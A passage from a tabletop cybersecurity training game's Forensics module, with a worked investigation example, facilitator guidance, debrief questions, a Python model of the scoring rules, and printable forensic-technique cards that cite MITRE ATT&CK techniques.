- Meters: Timeline 30%, Attack Chain 45%, Attribution 40%, Chain of Custody 10%
Blue Team: "This is expensive, but let's start the Memory Forensics Deep Dive on the admin workstation. If the attacker has malware in memory, we might find encryption keys or recent commands that show their intent."
TO Facilitator:
1. Check Cost: MEM-02 costs 20 Budget. Current budget 40. ✓ OK
2. Check Duration (v2.2): MEM-02 is Duration 3 — started this turn (turn 1 of 3), it resolves at the START of turn 7. It is now the one multi-turn investigation in flight.

Update Tracking:
- Budget: 40 - 20 = 20 remaining
- Turn: 5 → 6
- Meters: unchanged (results pending)
Blue Team: "While the memory analysis runs, let's Analyze our existing evidence. The suspicious admin login (EVD-04, T1078 Valid Accounts) lines up with the C2 callbacks (EVD-02, T1071 Application Layer Protocol): the login happened 20 minutes before the first beacon. This was credential theft followed by remote control."
TO Facilitator:
1. Check Cost: Analyze Existing Evidence costs 5 (v2.2). Budget 20 → 15 ✓. (Allowed while MEM-02 is in flight — Analyze is not an investigation.)
2. Check cards: EVD-04 and EVD-02 have not been Analyzed before ✓ — mark both as Analyzed (v2.2: each Evidence card only once)
3. Modifiers: +1 (references specific MITRE ATT&CK techniques) + 1 (IT security background) = +2
4. Roll: d20 = 12, total 14 vs. DC 10. Success! → Advance two meters by 10% each: Timeline 30% → 40%, Attribution 40% → 50%

Update Tracking:
- Budget: 15 remaining
- Turn: 6 → 7
- Meters: Timeline 40%, Attack Chain 45%, Attribution 50%, Chain of Custody 10%
Blue Team Deduction: "Credential theft, then hands-on-keyboard control. Now we need the memory results."
Start of turn — MEM-02 resolves (v2.2 Duration, started turn 5):
1. Set DC: MEM-02 has DC 15
2. Apply Modifiers: +2 (forensic analyst) + 1 (MALW-01 already completed) = +3
3. Roll: d20 = 11, total 14
4. Partial Success (14 is in the DC-2 to DC-1 band, 13-14) → Discover ONE complete Evidence card, EVD-09 "Attacker Command History", plus an INCOMPLETE second finding (fragments of an RC4 key — marked INCOMPLETE, no meter impact until completed or interpreted)
   - EVD-09 printed impacts: Timeline 40% → 65%, Attack Chain 45% → 70%, Attribution 50% → 65%, Chain of Custody 10% → 20%
   - Chain of Custody: 20% → 25% (v2.2: memory image hashed, extraction methodology documented)
Turn 7 action — Blue Team: "Follow the investigative lead on EVD-02: WHOIS and ASN lookup on the C2 domain to map related attacker infrastructure."
TO Facilitator:
1. Check Cost: Follow Investigative Lead costs 5 (v2.2). Budget 15 → 10 ✓
2. Set DC: 12
3. Apply Modifiers: +2 (detailed approach referencing prior evidence)
4. Roll: d20 = 14, total 16. Success! → Discover EVD-07 "Attacker Infrastructure Map" — apply its printed impacts (v2.2: no separate +20% Attribution bonus — No Double Counting)
   - EVD-07 printed impacts: Attribution 65% → 95%, Attack Chain 70% → 85%, Timeline 65% → 75%
   - Chain of Custody: 25% → 30% (v2.2: WHOIS records and passive-DNS exports archived)

Update Tracking:
- Budget: 10 remaining
- Turn: 7 → 8 of 8 (final turn)
- Meters: Timeline 75%, Attack Chain 85%, Attribution 95%, Chain of Custody 30%
Victory check: Condition 1 needs Attribution ≥ 90% ✓ (95%) AND Timeline ≥ 80% ✗ (75%). Not yet. Condition 2 needs Timeline ≥ 80% ✗. Play on.
Blue Team: "One more push on the timeline. We retry TIMELINE-01, now synthesizing the login timeline (EVD-04), the C2 beacons (EVD-02), and the attacker's command history (EVD-09)."
TO Facilitator:
1. Check Cost: TIMELINE-01 costs 5. Budget 10 → 5 ✓. Duration 1 — resolves now.
2. Set DC: 13
3. Apply Modifiers: +2 (DFIR training) + 1 (prior investigations provide clues) = +3
4. Roll: d20 = 15, total 18. Success! All timeline-type evidence has already been discovered, so no new Evidence card is produced — apply TIMELINE-01's own advance line instead (v2.2 No Double Counting): Timeline 75% → 100%, Attack Chain 85% → 100%

Update Tracking:
- Budget: 5 remaining
- Turn: 8 of 8 — game end
- Final meters: Timeline 100%, Attack Chain 100%, Attribution 95%, Chain of Custody 30%
Check Victory Conditions (v2.2 — victory is checked first, never overridden by a low meter):
Condition 1 "Full Attribution": Attribution ≥ 90% AND Timeline ≥ 80%?
- Attribution: 95% ✓
- Timeline: 100% ✓
- YES! VICTORY CONDITION 1 MET!
(For completeness: Condition 2 "Solid Case" fails on Chain of Custody 30% < 70%; Condition 3 "Partial Findings" would also be met with three meters ≥ 70% at game end. Note the v2.2 precedence rule: Chain of Custody sitting at 30% does NOT cause a failure — the old "any meter < 40%" clause is deleted. Meter averages are never used.)
Game Ends with VICTORY
Investigation Result: "Your forensic investigation successfully identified the attacker as a member of the [Eastern European Cybercriminal Group]. Key findings:
- Attack vector: Credential theft via password spray
- Control: C2 beaconing from checkupdate-style domains, hands-on-keyboard commands recovered from memory
- Timeline: fully reconstructed from signed logs, beacon timing, and command history
- Attribution: 95% confidence linked to known group via infrastructure map
- Caveat: evidence admissibility is weak (Chain of Custody 30%) — fine for hardening, not for court

Recommendations:
1. Implement multi-factor authentication on admin accounts
2. Deploy an EDR solution to detect persistence mechanisms
3. Implement network segmentation to limit lateral movement
4. Increase logging and monitoring of admin activities
This investigation will inform the Hardening, Network Building, and Audit modules going forward."
Early Game (Turns 1-3):
- Start with cheaper, lower-DC investigations (Log Analysis, Timeline Reconstruction)
- Build a foundation of knowledge before attempting expensive techniques
- Goal: 50%+ progress on any meter by turn 3

Mid Game (Turns 4-7):
- Use findings from early investigations to guide more expensive deep dives
- Follow Investigative Leads to get "bang for your budget"
- Aim for 75%+ on at least two meters by turn 6

Late Game (Turns 8+):
- If you have momentum, push for one complete meter (≥90%)
- If budget is tight, focus on two meters reaching ≥70% (Condition 3)
- Make bold investigations; you have less to lose

To Gain Bonuses:
- Explain not just WHAT you'll investigate, but HOW and WHY
- Reference specific evidence already discovered
- Mention MITRE ATT&CK techniques you're looking for
- Example (gains +2): "We found a persistence mechanism in the scheduled tasks. This matches T1053 (Scheduled Task/Job). Let's do Memory Forensics to find if the malware is still resident in RAM and tracking recent C2 communications."

Create Connections:
- Note which investigations led to which evidence cards
- Look for patterns: "All malware samples have Russian-language strings"
- Timeline building: "Login at 2:15, C2 connection at 2:10, exfiltration at 2:25"
- These connections trigger the Analyze Evidence action and drive attribution forward
Turn 8+: Each turn matters. Budget running low. Critical decisions.
If game is ending early (Victory Condition 1 or 2 before turn 6): Let it happen. Means they played smart. (Condition 3 is only checked at game end.)
For Beginner Investigators:
- Use TIER 1 attacks (6-8 turns, low DC, no anti-forensics)
- Provide hints during briefing ("We recovered a memory dump")
- Allow retries on failed Investigation Actions

For Experienced Investigators:
- Use TIER 3-4 attacks (11-15 turns, high DC, sophisticated anti-forensics)
- Limit Budget more strictly
- Add False Evidence cards (partial investigation leads to wrong conclusion)
After game concludes, facilitate discussion:
On Investigation Process:
1. Which investigation technique was most valuable? Why?
2. What would you do differently with more budget?
3. What evidence was hardest to interpret?
4. How did you decide which investigation to do next?

On Attack Reconstruction:
1. Walk through the attack chain step-by-step. What happened first? Last?
2. How did the attacker maintain access without being detected immediately?
3. What's one technique that could have prevented this entire attack?

On Attribution:
1. What evidence pointed to the attacker's identity?
2. How confident are you in the attribution? (At 75%? 90%?)
3. What additional evidence would make you 95%+ confident?

On Real-World Forensics:
1. How does this compare to actual forensic investigations you've studied?
2. What tools mentioned in the game (memory forensics, malware analysis) are used in real incident response?
3. Why does attribution matter? (Law enforcement, threat intelligence sharing, policy response)

On Lessons Learned:
1. What control from the Hardening module could have detected this attack early?
2. How would the Network Building architecture limit lateral movement?
3. What Audit & Compliance questions need to be answered?
Modified Rules: Reduce turn count by 3 (so 3-7 turns instead of 6-10)
Effect: Creates higher stakes; investigators must make faster decisions; less time for methodical analysis
When to Use: Advanced investigators who want more challenge; time-limited classroom sessions
Modified Rules: TO secretly includes 1-2 "False Evidence" cards that appear legitimate but are actually red herrings
Effect: Attribution becomes harder; investigators must corroborate findings; critical thinking required
Example: Malware sample analysis reveals Russian-language strings → seems like Eastern European group. But it was actually planted by another threat group to frame competitors.
When to Use: Teaching about false positives and need for corroboration
Modified Rules: Start with 40% progress already on one or two meters (from prior investigation by another team)
Effect: Investigators build on existing findings rather than starting from scratch
When to Use: Teaching how investigations are handed off; continuing previous work
Modified Rules: Two teams of investigators compete to achieve highest progress on most meters
Scoring: +3 points per meter ≥ 90%, +2 points per meter 70-89%, +1 per meter 40-69%
When to Use: Competitive classroom tournament; multiple teams investigating same breach simultaneously
30-minute Warm-up: Forensics solo (TIER 1, 6-turn simplified scenario)
90-minute Session: Incident Response (45 min) + Forensics (45 min)
- Phase 1: IR team detects attack chain
- Phase 2: Forensics team investigates findings

120-minute Session: Incident Response → Disaster Recovery mini → Forensics
- Phase 1: IR failure (breach not contained)
- Phase 2: DR (crisis management, brief)
- Phase 3: Forensics (investigation & attribution)

180+ minute Session: Complete lifecycle with Forensics
- Network Building (45 min) → Hardening (45 min) → Incident Response (45 min) → Forensics (30 min)
Setup: Choose TIER (1-4), Roll d4, Announce turn count and starting budget (75)
Each Turn:
1. Resolve arrivals (v2.2): Any Duration 2-3 investigation completing this turn rolls and resolves at the start of the turn
2. Choose action: Conduct Investigation (card cost, Duration 1-3), Analyze Evidence (5 Budget, each Evidence card only once), or Follow Lead (5 Budget)
3. Pay cost: Deduct Budget
4. Roll d20: Add skill modifier, compare to DC (partial success on DC-2 to DC-1); Duration 2-3 investigations roll when they complete
5. Resolve: Discover evidence (apply the Evidence card's printed impacts — never also the investigation card's advance line), or fail
6. Update: Budget, Turn counter, Progress Meters (+5% Chain of Custody per Evidence discovery with stated preservation)

Resources:
- Budget: 75 (represents forensic lab time; tracker range 0-100)
- Turns: 6-15 (depends on tier + d4 roll)
- Progress Meters: Timeline, Attack Chain, Attribution, Chain of Custody (each 0-100%)

Victory (v2.2):
- V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
- V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
- V3 "Partial Findings": any two meters ≥70% at game end

Failure (v2.2): At the turn limit, no victory condition met. Victory is checked first — there is no meter-minimum failure clause, and budget exhaustion is not a loss.
Before playing, ensure you have:
[ ] Timeline & Attribution (2 cards)
[ ] 12 Evidence Cards (printable from cards/forensics/core-deck/)
[ ] Attack Activity (3 cards: EVD-09, EVD-11, EVD-12)
[ ] 4 Findings Cards
[ ] FIND-04: Investigative Gaps & Recommendations
[ ] 1d20 die
Q: Can I play Forensics if I've never played Incident Response? A: Yes! Forensics standalone is completely self-contained. You don't need to have played IR, Hardening, or any other module first.
Q: How long does Forensics take? A: Typically 45-90 minutes depending on group experience level and decision speed. Experienced investigators finish faster.
Q: Can I play Forensics with a large group? A: Yes! 4-8 investigators is ideal. With more, split into two teams (each team has its own TO). You can even do competitive mode where both teams investigate the same breach.
Q: What if investigators want to know the tier? A: Don't tell them. Part of the game is discovering how sophisticated the attacker is through evidence analysis. Let them discover it.
Q: What if we run out of budget before solving the case? A: That's a realistic outcome, and it is NOT an automatic loss (v2.2). Keep playing to the turn limit — the cheap 5-Budget actions (Analyze Evidence, Follow Lead, LOG-01, TIMELINE-01) stretch a thin budget, and at game end you check victory normally. If any two meters are ≥70% at game end, you win via Condition 3 (like real-world investigations with incomplete findings). If no condition is met at the turn limit, the investigation is inconclusive.
Q: Can we retry a failed investigation? A: You can attempt the same investigation again next turn (costs full budget again), but you still don't know if you'll succeed. You're essentially re-investigating the same evidence looking for something you missed.
All printable cards are available in:
- cards/forensics/core-deck/investigation-cards.md — 12 Investigation Action cards
- cards/forensics/core-deck/evidence-cards.md — 12 Evidence cards + 4 Findings cards (Findings section)
Progress Meter Tracker: print templates coming in the print pack. Until then, draw a simple 4-meter tracker on paper: four rows labeled Timeline Completeness, Attack Chain Reconstruction, Attribution Confidence, and Evidence Chain of Custody, each marked 0-100% in 5% steps, plus a Turn row and a Budget row (0-100).
Ready to investigate? Print your cards, gather 1-4 forensic analysts, and begin your investigation. Good luck!
cards/forensics/core-deck/investigation-cards.md
Version: 2.2 - Playtest Edition Card Count: 12 Investigation Action Cards Printable: Yes (see printing instructions below)
Investigation Action cards represent specific forensic analysis techniques that investigators can deploy to discover evidence about the attack. Each card has a Difficulty Class (DC) that represents the skill required to successfully complete the investigation, a Cost in Budget, and a Duration showing how many turns the investigation takes.
Duration rule (v2.2): Starting an investigation with Duration N occupies your action (and its Budget cost) on the turn you start it. Counting that turn as turn 1, the roll is made and the results arrive at the START of turn N — so Duration 1 resolves immediately, Duration 2 at the start of the next turn, Duration 3 two turns after starting. Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting.
No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts (plus the +5% Chain of Custody handling bonus for stating how it was preserved). The "Advance" line in each card's SUCCESS block applies only when no Evidence card is produced (e.g., no suitable undiscovered Evidence remains); partial-success advance lines apply as printed.
Each Investigation Action Card includes:
- Card ID: Unique identifier (DISK-01, MEM-01, LOG-01, etc.)
- Title: Name of investigation technique
- MITRE ATT&CK: Referenced technique(s) this investigation detects
- Difficulty Class (DC): Roll d20+modifiers vs. this to succeed (typically 11-15)
- Cost: Budget units required
- Duration: Number of turns the investigation takes
- Description: What the investigation does and what evidence it reveals
- Success Conditions: What happens on success, partial success, or failure
- Chain of Custody Notes: Any admissibility or documentation concerns
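The turn procedure and victory rules from the quick reference, together with the Duration and No Double Counting rules above, written out as an added Python illustration (not code from the game or its repository). LOG-01 and DISK-01 values are copied from the cards below; the Evidence deck, modifiers and die rolls are constructed sample data, and the incomplete Evidence cards of a partial success are not modelled.

```python
# Added illustration of the v2.2 Forensics rules; not code from the game's repo.
# Card values copied from LOG-01 and DISK-01; deck, modifiers and rolls are constructed.
from dataclasses import dataclass

METER_CAP = 100           # progress meters and the Budget tracker run 0-100
HANDLING_BONUS = 5        # +5% Chain of Custody per discovery with stated preservation
METER_NAMES = ("timeline", "attack_chain", "attribution", "custody")


@dataclass(frozen=True)
class Meters:
    timeline: int = 0
    attack_chain: int = 0
    attribution: int = 0
    custody: int = 0

    def advance(self, **deltas: int) -> "Meters":
        """Apply meter deltas, clamped to the 0-100 tracker range."""
        vals = {k: getattr(self, k) for k in METER_NAMES}
        for k, d in deltas.items():
            vals[k] = max(0, min(METER_CAP, vals[k] + d))
        return Meters(**vals)


@dataclass(frozen=True)
class InvestigationCard:
    card_id: str
    dc: int
    cost: int
    duration: int
    evidence_pool: tuple      # Evidence cards this technique may discover
    advance_success: dict     # applied ONLY when no Evidence card is produced
    advance_partial: dict     # partial-success line, applied as printed


LOG_01 = InvestigationCard(
    "LOG-01", dc=11, cost=5, duration=1,
    evidence_pool=("Suspicious Login Timeline", "Privilege Escalation Attempt",
                   "Service Installation"),
    advance_success={"timeline": 15, "attack_chain": 10},
    advance_partial={"timeline": 5, "attack_chain": 5})
DISK_01 = InvestigationCard(
    "DISK-01", dc=12, cost=10, duration=2,
    evidence_pool=("Malware Sample", "Persistence Mechanism", "Downloaded Malware"),
    advance_success={"timeline": 10, "attack_chain": 15},
    advance_partial={"timeline": 5, "attack_chain": 5})

# Constructed Evidence deck: card name -> printed meter impacts (illustrative).
SAMPLE_DECK = {"Suspicious Login Timeline": {"timeline": 20, "attack_chain": 5}}


def arrival_turn(start_turn: int, duration: int, rush: bool = False) -> int:
    """Turn at whose START a Duration-N investigation rolls and resolves."""
    if rush:                  # DISK-01 rush option: +5 Budget buys Duration 1
        duration = 1
    return start_turn + duration - 1   # the starting turn counts as turn 1 of N


def outcome(card: InvestigationCard, d20: int, modifiers: int) -> str:
    """d20 + modifiers vs. DC; partial success on DC-2 to DC-1."""
    total = d20 + modifiers
    if total >= card.dc:
        return "success"
    if card.dc - 2 <= total <= card.dc - 1:
        return "partial"
    return "failure"


def resolve(card, d20, modifiers, meters, discovered, budget, deck,
            preservation_stated=False):
    """Pay, roll, and apply exactly ONE of: Evidence impacts, the advance line,
    the partial line, or nothing. Returns (meters, discovered, budget, note)."""
    if budget < card.cost:
        raise ValueError(f"{card.card_id} costs {card.cost}, Budget is {budget}")
    budget -= card.cost                     # Budget is spent on every result
    result = outcome(card, d20, modifiers)
    if result == "failure":
        return meters, discovered, budget, f"{card.card_id}: failure"
    if result == "partial":
        return (meters.advance(**card.advance_partial), discovered, budget,
                f"{card.card_id}: partial success")
    remaining = [e for e in card.evidence_pool if e in deck and e not in discovered]
    if remaining:
        ev = remaining[0]                   # No Double Counting: impacts only,
        impacts = dict(deck[ev])            # the advance line is NOT added
        if preservation_stated:
            impacts["custody"] = impacts.get("custody", 0) + HANDLING_BONUS
        return (meters.advance(**impacts), discovered | {ev}, budget,
                f"{card.card_id}: discovered {ev}")
    return (meters.advance(**card.advance_success), discovered, budget,
            f"{card.card_id}: no Evidence left, advance line applied")


def check_victory(m: Meters, game_end: bool = False):
    """V1 and V2 are checked every turn, V3 only at the turn limit. Victory is
    checked first; a low meter or an exhausted Budget is never a loss."""
    if m.attribution >= 90 and m.timeline >= 80:
        return "V1 Full Attribution"
    if m.timeline >= 80 and m.attack_chain >= 80 and m.custody >= 70:
        return "V2 Solid Case"
    if game_end:
        strong = sum(getattr(m, k) >= 70 for k in METER_NAMES)
        return "V3 Partial Findings" if strong >= 2 else "Inconclusive"
    return None
```

Feeding the final meters of the worked turn 8 (Timeline 100, Attack Chain 100, Attribution 95, Chain of Custody 30) to `check_victory` returns V1, with Custody 30% changing nothing.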
╔════════════════════════════════════════════════════════════════╗
║ DISK-01: DISK IMAGE & ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Forensic Disk Imaging & Analysis ║
║ MITRE ATT&CK: T1005 (Data from Local System), T1025 (Data from ║
║ Removable Media) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 12 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns (v2.2 rush: pay +5 Budget for Duration 1) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Create a bit-for-bit disk image of the compromised system, ║
║ then examine file system artifacts, deleted files, and ║
║ hidden data. This is a foundational forensic technique. ║
║ ║
║ What You're Looking For: ║
║ - Malware files (executables, scripts, libraries) ║
║ - Deleted files (file carving reveals overwritten data) ║
║ - Persistence mechanisms (startup folders, registry runs) ║
║ - Downloaded files (browser cache, temp directories) ║
║ - Suspicious file timestamps (backdating, mismatches) ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 12): ║
║ Discover ONE Evidence card from: Malware Sample, Persistence ║
║ Mechanism, or Downloaded Malware evidence set. ║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +10%, Attack Chain +15% ║
║ ║
║ PARTIAL SUCCESS (roll DC-2 to DC-1 = 10-11): ║
║ Discover INCOMPLETE Evidence card (partial findings). ║
║ Advance: Timeline Completeness +5%, Attack Chain +5% ║
║ ║
║ FAILURE (roll < 10): ║
║ No evidence discovered. Budget still spent. Take a turn. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Disk image must be bit-for-bit copy. Chain of custody: ║
║ Strong - Imaging is gold standard in forensics. ║
║ ✓ All evidence from this source is admissible in court ║
║ ║
║ SKILL MODIFIERS: ║
║ +2 if investigator has formal GCIH/GCFE training ║
║ +1 if investigator has IT administration background ║
║ +1 if team provides detailed explanation of imaging process ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Disk imaging is time-consuming (hence 2 turn cost) ║
║ • Can be combined with DISK-02 for deeper analysis ║
║ • Foundation for all disk-based forensic work ║
║ • Works best on traditional disk systems (less effective on ║
║ SSDs with wear-leveling and TRIM commands) ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ DISK-02: FILE SYSTEM CARVING ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced File Recovery & Data Carving ║
║ MITRE ATT&CK: T1074 (Data Staged), T1485 (Data Destruction) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 14 ║
║ Budget Cost: 15 ║
║ Duration: 3 turns (specialized expertise required) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Advanced carving techniques recover data from unallocated ║
║ disk space and file slack, even when files have been deleted ║
║ and storage sectors overwritten. Uses specialized tools like ║
║ EnCase, FTK, or open-source carving tools. ║
║ ║
║ What You're Looking For: ║
║ - Deleted malware (recovered from free space) ║
║ - Temporary files (attacker staging data before exfil) ║
║ - Encryption keys or passphrases (memory remnants on disk) ║
║ - Hidden partitions or file systems ║
║ - Slack space artifacts ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 14): ║
║ Discover ONE Evidence card from: Deep Malware Samples, ║
║ Encryption Keys Found, or Hidden Backdoor evidence. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Chain of Custody +10% ║
║ ║
║ PARTIAL SUCCESS (roll 12-13): ║
║ Discover partial data (e.g., fragments of deleted file). ║
║ Advance: Attack Chain +10%, Chain of Custody +5% ║
║ ║
║ FAILURE (roll < 12): ║
║ Data too corrupted or already overwritten. No recovery. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Carving is technically sound but must be documented carefully. ║
║ Chain of Custody: Strong if done by certified analyst. ║
║ ⚠ Partial carving may be challenged in court (incomplete ║
║ file recovery). Recommend combining with other techniques. ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator has GCFE (Certified Forensic Examiner) ║
║ +1 if investigator has disk forensics experience ║
║ +1 if combined with DISK-01 investigation already done ║
║ -1 if SSD drives present (wear-leveling complicates carving) ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Expensive investigation (15 budget) for specialized work ║
║ • Can take weeks in real incidents; represented as 3 turns ║
║ • Most valuable for discovering deleted persistence and ║
║ encryption keys ║
║ • Less effective on modern systems with TRIM/wear-leveling ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MEM-01: MEMORY DUMP & ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Volatile Memory Forensics (RAM analysis) ║
║ MITRE ATT&CK: T1055 (Process Injection), T1057 (Process ║
║ Discovery), T1518 (Software Discovery) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13 ║
║ Budget Cost: 15 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Capture RAM (volatile memory) from running system during ║
║ incident response, then analyze for active processes, malware, ║
║ injected code, network connections, and encryption keys in ║
║ memory. Uses tools like Volatility, Rekall, or proprietary ║
║ memory analysis suites. ║
║ ║
║ What You're Looking For: ║
║ - Malware processes running in memory ║
║ - Injected code (shellcode, DLLs in unexpected processes) ║
║ - Network connections (established C2 connections) ║
║ - Encryption keys and credentials in memory ║
║ - Command history from interactive shells ║
║ - Rootkit or kernel-level hooks ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 13): ║
║ Discover ONE Evidence card from: Active Malware Process, ║
║ C2 Connection, or Injected Code evidence. ║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +20%, Timeline Completeness +10% ║
║ ║
║ PARTIAL SUCCESS (roll 11-12): ║
║ Discover evidence of suspicious process (incomplete details). ║
║ Advance: Attack Chain +10%, Timeline Completeness +5% ║
║ ║
║ FAILURE (roll < 11): ║
║ Malware may use anti-forensics in memory; analysis inconclusive║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Memory capture is volatile and must be done immediately. ║
║ Chain of Custody: Strong if documented with timestamps. ║
║ ✓ Admissible, but include disclaimer about volatile nature ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +2 if investigator trained in memory forensics (Volatility) ║
║ +1 if malware analysis background ║
║ +1 if Analyze Evidence action previously discovered malware ║
║ -2 if memory was overwritten before capture (time-sensitive) ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Time-critical: Memory is lost if system is rebooted ║
║ • Reveals active threats that may not exist on disk ║
║ • Combines process discovery with malware analysis ║
║ • Most valuable for finding active C2 connections ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ MEM-02: MEMORY FORENSICS DEEP DIVE ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Advanced Volatile Memory Analysis ║
║ MITRE ATT&CK: T1112 (Modify Registry), T1055 (Process ║
║ Injection), T1140 (Deobfuscate/Decode Files) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 15 ║
║ Budget Cost: 20 ║
║ Duration: 3 turns (expert-level analysis) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Expert-level memory analysis including malware behavior ║
║ simulation, deobfuscation of shellcode, reverse engineering ║
║ of code injected into memory, and recovery of encryption keys. ║
║ Requires deep expertise in assembly language, malware tactics, ║
║ and memory layouts. ║
║ ║
║ What You're Looking For: ║
║ - Obfuscated/encrypted malware payloads (deobfuscate them) ║
║ - Code injection techniques (understand HOW malware hides) ║
║ - Encryption keys and passphrases in memory (crypto recovery) ║
║ - Malware command history (recent attacker commands) ║
║ - Process hollowing or code caves (anti-analysis techniques) ║
║ - Privilege escalation vulnerabilities in use ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 15): ║
║ Discover TWO Evidence cards: One from malware behavior set ║
║ (e.g., Encryption Keys, Command History) + one from attack ║
║ technique set (e.g., Code Injection Method, Exploitation Used).║
║ Advance (only if no Evidence card produced): ║
║ Attack Chain +25%, Attribution +20% ║
║ ║
║ PARTIAL SUCCESS (roll 13-14): ║
║ Discover ONE complete Evidence + incomplete second evidence. ║
║ Advance: Attack Chain +15%, Attribution +10% ║
║ ║
║ FAILURE (roll < 13): ║
║ Malware uses sophisticated anti-analysis; analysis fails. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Analysis documentation critical (how did you reach conclusions)║
║ Chain of Custody: Strong if reverse engineering is documented. ║
║ ⚠ Conclusions must be explained clearly for court admissibility║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +3 if investigator has GCFA (Certified Forensic Analyst) ║
║ +2 if malware reverse engineering background ║
║ +1 if Malware Analysis card already completed ║
║ +1 if detailed explanation of deobfuscation approach ║
║ -2 if malware is heavily obfuscated or virtualized ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Most expensive memory analysis (20 budget) ║
║ • Requires reverse engineering expertise ║
║ • Discovers "why" the malware works, not just "what" ║
║ • Essential for understanding sophisticated attacks ║
║ • Can take weeks in real investigations; represented as 3 turns║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ LOG-01: EVENT LOG ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Windows/Linux Log Examination ║
║ MITRE ATT&CK: T1552 (Unsecured Credentials), T1098 (Account ║
║ Manipulation) ║
║ T1021 (Remote Services), T1078 (Valid Accounts) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 11 ║
║ Budget Cost: 5 ║
║ Duration: 1 turn ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Analyze system event logs (Windows Event Log, syslog, etc.) ║
║ to identify user logins, privilege escalations, file access, ║
║ and process execution. This is foundational and relatively ║
║ quick—useful for establishing a basic timeline. ║
║ ║
║ What You're Looking For: ║
║ - Failed login attempts (brute force evidence) ║
║ - Successful logins from unusual locations/times ║
║ - Privilege escalation attempts (RunAs, sudo) ║
║ - Process creation events ║
║ - Service installation events ║
║ - File access to sensitive files ║
╠════════════════════════════════════════════════════════════════╣
║ SUCCESS (roll ≥ DC 11): ║
║ Discover ONE Evidence card from: Suspicious Login Timeline, ║
║ Privilege Escalation Attempt, or Service Installation evidence.║
║ Advance (only if no Evidence card produced): ║
║ Timeline Completeness +15%, Attack Chain +10% ║
║ ║
║ PARTIAL SUCCESS (roll 9-10): ║
║ Discover partial timeline (logs are fragmented or unclear). ║
║ Advance: Timeline Completeness +5%, Attack Chain +5% ║
║ ║
║ FAILURE (roll < 9): ║
║ Logs were deleted or corrupted; no useful evidence. ║
╠════════════════════════════════════════════════════════════════╣
║ CHAIN OF CUSTODY: ║
║ Logs must be exported with metadata (timestamps, user context).║
║ Chain of Custody: Strong if logs are digitally signed. ║
║ ✓ Admissible in court (widely accepted evidence type) ║
╠════════════════════════════════════════════════════════════════╣
║ SKILL MODIFIERS: ║
║ +1 if investigator has Windows administration experience ║
║ +1 if investigator has SIEM/log analysis background ║
║ +1 if detailed explanation of log analysis approach ║
║ +2 if prior Timeline Reconstruction investigation completed ║
╠════════════════════════════════════════════════════════════════╣
║ NOTES: ║
║ • Cheapest investigation (5 budget) - good starting point ║
║ • Fastest (1 turn) - can be done early in investigation ║
║ • Foundation for Timeline Reconstruction and Log Correlation ║
║ • May be ineffective if attacker deleted logs ║
║ (add anti-forensics penalty: +2 DC) ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ LOG-02: DEEP LOG CORRELATION ║
╠════════════════════════════════════════════════════════════════╣
║ Technique: Cross-System Log Analysis & Correlation ║
║ MITRE ATT&CK: T1087 (Account Discovery), T1021 (Remote Services)║
║ T1083 (File and Directory Discovery) ║
╠════════════════════════════════════════════════════════════════╣
║ Difficulty Class: 13 ║
║ Budget Cost: 10 ║
║ Duration: 2 turns ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Correlate logs from multiple systems (servers, firewalls, IDS, ║
║ proxies, domain controllers) to build a complete timeline of ║
║ attacker lateral movement and actions across the environment. ║
║ Requires SIEM expertise or manual correlation tools. ║
║ ║
║ What You're Looking For: ║
